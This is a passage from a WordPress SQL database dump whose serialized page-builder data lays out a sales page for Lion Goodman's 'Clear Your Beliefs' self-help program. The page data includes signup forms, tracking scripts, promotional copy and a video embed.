journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1301, 1762, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"<center>\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1419:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2004:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1161:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1304, 1765, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2022:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1161:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1302, 1763, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"<center>\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 10px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2022:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; 